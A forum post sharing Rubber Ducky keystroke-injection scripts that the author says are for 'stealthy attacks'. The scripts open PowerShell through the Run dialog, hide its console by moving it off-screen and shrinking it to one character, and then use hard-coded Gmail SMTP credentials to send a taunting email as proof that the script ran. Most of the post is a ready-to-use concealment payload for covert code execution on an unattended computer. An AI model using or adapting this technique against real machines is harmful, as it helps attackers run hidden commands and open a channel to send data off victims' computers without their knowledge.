Jump to content

Hide PowerShell Console with Focus


desert33
 Share

Recommended Posts

I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears.

Here are the commands for the basic idea:

REM Once powershell is up and running
ALT SPACE
STRING m
LEFTARROW
REPEAT 50
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER

I found that shrinking the console size is faster than moving the console, so I played around with doing both several times to try and make the console disappear faster. To make sure the Ducky still had focus and was running, I had it send me an email.

Here is my test script that uses this hiding technique:

REM Author: desert33
REM Name: hidePS.txt
REM Purpose: Try to Hide PowerShell for a more stealthy approach. 
REM Encoder V2.4
REM Using the run command for a broader OS base.

REM *** Initial Delay *** 
DELAY 2000

REM *** Open powershell ***
GUI r
DELAY 250
STRING powershell
ENTER
DELAY 400

REM *** Hide PowerShell ***
STRING [console]::WindowHeight=10
ENTER
STRING [console]::WindowWidth=10
ENTER
ALT SPACE
STRING m
LEFTARROW
REPEAT 30
STRING [console]::WindowHeight=5
ENTER
STRING [console]::WindowWidth=5
ENTER
ALT SPACE
STRING m
LEFTARROW
REPEAT 10
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER

REM *** Send an email to prove Ducky is working ***

STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'from@email.com'
ENTER
STRING $ReportEmail.To.Add('to@email.com')
ENTER
STRING $ReportEmail.Subject = 'Hello'
ENTER
STRING $ReportEmail.Body = '"You got Ducked. Better luck next time." -desert33'
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER

DELAY 100

REM *** Exit ***
STRING EXIT
ENTER
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...